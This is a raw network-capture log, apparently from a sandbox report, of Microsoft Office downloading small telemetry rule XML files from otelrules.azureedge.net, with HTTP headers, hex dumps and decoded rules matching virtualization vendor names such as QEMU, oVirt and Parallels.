                                                                    x-azure-ref: 20241028T130330Z-17c5cb586f69w69mgazyf263an000000042000000000bt7w
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:30 UTC468INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 35 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 50 70 5d 5b 45 65 5d 5b 4e 6e 5d 5b 53 73 5d 5b 54 74 5d 5b 41 61 5d 5b 43 63 5d 5b 4b 6b 5d 20 5b 46 66 5d 5b 4f 6f 5d 5b 55 75 5d 5b 4e 6e 5d 5b 44 64 5d 5b 41 61 5d 5b 54 74 5d 5b 49 69 5d 5b 4f 6f 5d 5b 4e 6e 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120659" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120657" /> <SR T="2" R="([Oo][Pp][Ee][Nn][Ss][Tt][Aa][Cc][Kk] [Ff][Oo][Uu][Nn][Dd][Aa][Tt][Ii][Oo][Nn])"> <S T="1" F="1" M="I


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    82192.168.2.44983813.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:30 UTC192OUTGET /rules/rule120661v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:30 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 411
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:44 GMT
                                                                    ETag: "0x8DC582B989AF051"
                                                                    x-ms-request-id: 8e6d5db5-101e-0017-4c27-2747c7000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130330Z-16849878b78q9m8bqvwuva4svc00000003fg00000000hk7g
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:30 UTC411INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 31 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 4f 6f 5d 5b 56 76 5d 5b 49 69 5d 5b 52 72 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120661" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <SR T="2" R="([Oo][Vv][Ii][Rr][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    83192.168.2.44983713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:30 UTC192OUTGET /rules/rule120660v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:30 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 485
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:39 GMT
                                                                    ETag: "0x8DC582BB9769355"
                                                                    x-ms-request-id: e574f622-301e-0052-4beb-2565d6000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130330Z-16849878b78qf2gleqhwczd21s000000059g0000000076m0
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:30 UTC485INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 30 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 35 39 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120660" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120659" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    84192.168.2.44984013.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:30 UTC192OUTGET /rules/rule120663v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:30 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 427
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                    ETag: "0x8DC582BB556A907"
                                                                    x-ms-request-id: a342e9ea-d01e-0066-419c-27ea17000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130330Z-16849878b78qwx7pmw9x5fub1c000000038g000000005mcc
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:30 UTC427INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 33 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 41 61 5d 5b 52 72 5d 5b 41 61 5d 5b 4c 6c 5d 5b 4c 6c 5d 5b 45 65 5d 5b 4c 6c 5d 5b 53 73 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120663" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <SR T="2" R="([Pp][Aa][Rr][Aa][Ll][Ll][Ee][Ll][Ss])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W"


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    85192.168.2.44983913.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:30 UTC192OUTGET /rules/rule120662v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:30 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:30 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 470
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:42 GMT
                                                                    ETag: "0x8DC582BBB181F65"
                                                                    x-ms-request-id: 6cbbe1db-401e-0083-6516-26075c000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130330Z-16849878b78j7llf5vkyvvcehs000000061000000000hfgn
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:30 UTC470INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 32 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 31 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120662" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120661" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    86192.168.2.44984113.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:31 UTC192OUTGET /rules/rule120664v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:31 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 502
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:35 GMT
                                                                    ETag: "0x8DC582BB6A0D312"
                                                                    x-ms-request-id: fc13fe58-401e-000a-0af3-244a7b000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130331Z-15b8d89586f8nxpt6ys645x5v0000000064000000000bmuh
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:31 UTC502INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 34 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120664" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    87192.168.2.44984213.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:31 UTC192OUTGET /rules/rule120665v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:31 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 407
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:25:52 GMT
                                                                    ETag: "0x8DC582B9D30478D"
                                                                    x-ms-request-id: 3281a84b-401e-0029-700c-289b43000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130331Z-17c5cb586f6sqz6fff89etrx0800000004m000000000bb4u
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache-Info: L1_T2
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:31 UTC407INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 35 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 33 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 50 70 5d 5b 53 73 5d 5b 53 73 5d 5b 43 63 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120665" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120663" /> <SR T="2" R="([Pp][Ss][Ss][Cc])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    88192.168.2.44984313.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:31 UTC192OUTGET /rules/rule120666v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:31 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 474
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                    ETag: "0x8DC582BB3F48DAE"
                                                                    x-ms-request-id: 4b1c8405-301e-005d-7701-27e448000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130331Z-16849878b7898p5f6vryaqvp5800000005y0000000007989
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:31 UTC474INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 36 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120666" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    89192.168.2.44984413.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:31 UTC192OUTGET /rules/rule120667v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:31 UTC470INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 408
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:40 GMT
                                                                    ETag: "0x8DC582BB9B6040B"
                                                                    x-ms-request-id: cea37fdd-f01e-003f-5ff2-24d19d000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130331Z-r197bdfb6b4gx6v9pg74w9f47s000000070g000000000cs9
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:31 UTC408INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 37 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 35 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 5e 28 5b 51 71 5d 5b 45 65 5d 5b 4d 6d 5d 5b 55 75 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72 75 65 22 3e 0d 0a 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120667" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120665" /> <SR T="2" R="^([Qq][Ee][Mm][Uu])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="true">


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    90192.168.2.44984513.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:31 UTC192OUTGET /rules/rule120668v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:31 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:31 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 469
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:30 GMT
                                                                    ETag: "0x8DC582BB3CAEBB8"
                                                                    x-ms-request-id: ad4459d7-101e-007a-6a4c-27047e000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130331Z-16849878b7828dsgct3vrzta7000000003d000000000eznu
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:31 UTC469INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 38 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 54 48 20 54 3d 22 32 22 3e 0d 0a 20 20 20 20 20 20 3c 4f 20 54 3d 22 45 51 22 3e 0d 0a 20 20 20 20 20 20 20 20 3c 4c 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 3c 55 20 54 3d 22 45 71 75 61 6c 73 4e 75 6c 6c 22 3e 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 30 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 20 20
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120668" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <TH T="2"> <O T="EQ"> <L> <U T="EqualsNull"> <S T="1" F="0" M="Ignore" />


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    91192.168.2.44984613.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120669v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:32 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 416
                                                                    Connection: close
                                                                    Cache-Control: public, max-age=604800, immutable
                                                                    Last-Modified: Tue, 09 Apr 2024 00:26:32 GMT
                                                                    ETag: "0x8DC582BB5284CCE"
                                                                    x-ms-request-id: bde7aa86-f01e-0052-08e5-279224000000
                                                                    x-ms-version: 2018-03-28
                                                                    x-azure-ref: 20241028T130332Z-17c5cb586f6mkpfk79wxvcahc000000005m00000000006x8
                                                                    x-fd-int-roxy-purgeid: 0
                                                                    X-Cache: TCP_HIT
                                                                    X-Cache-Info: L1_T2
                                                                    Accept-Ranges: bytes
                                                                    2024-10-28 13:03:32 UTC416INData Raw: ef bb bf 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 0d 0a 3c 52 20 49 64 3d 22 31 32 30 36 36 39 22 20 56 3d 22 30 22 20 44 43 3d 22 53 4d 22 20 54 3d 22 53 75 62 72 75 6c 65 22 20 78 6d 6c 6e 73 3d 22 22 3e 0d 0a 20 20 3c 53 3e 0d 0a 20 20 20 20 3c 52 20 54 3d 22 31 22 20 52 3d 22 31 32 30 36 36 37 22 20 2f 3e 0d 0a 20 20 20 20 3c 53 52 20 54 3d 22 32 22 20 52 3d 22 28 5b 52 72 5d 5b 45 65 5d 5b 44 64 5d 20 5b 48 68 5d 5b 41 61 5d 5b 54 74 5d 29 22 3e 0d 0a 20 20 20 20 20 20 3c 53 20 54 3d 22 31 22 20 46 3d 22 31 22 20 4d 3d 22 49 67 6e 6f 72 65 22 20 2f 3e 0d 0a 20 20 20 20 3c 2f 53 52 3e 0d 0a 20 20 3c 2f 53 3e 0d 0a 20 20 3c 43 20 54 3d 22 57 22 20 49 3d 22 30 22 20 4f 3d 22 74 72
                                                                    Data Ascii: <?xml version="1.0" encoding="utf-8"?><R Id="120669" V="0" DC="SM" T="Subrule" xmlns=""> <S> <R T="1" R="120667" /> <SR T="2" R="([Rr][Ee][Dd] [Hh][Aa][Tt])"> <S T="1" F="1" M="Ignore" /> </SR> </S> <C T="W" I="0" O="tr


                                                                    Session IDSource IPSource PortDestination IPDestination Port
                                                                    92192.168.2.44984713.107.246.60443
                                                                    TimestampBytes transferredDirectionData
                                                                    2024-10-28 13:03:32 UTC192OUTGET /rules/rule120670v0s19.xml HTTP/1.1
                                                                    Connection: Keep-Alive
                                                                    Accept-Encoding: gzip
                                                                    User-Agent: Microsoft Office/16.0 (Windows NT 10.0; 16.0.16827; Pro)
                                                                    Host: otelrules.azureedge.net
                                                                    2024-10-28 13:03:32 UTC491INHTTP/1.1 200 OK
                                                                    Date: Mon, 28 Oct 2024 13:03:32 GMT
                                                                    Content-Type: text/xml
                                                                    Content-Length: 472
                                                                    Connection: close
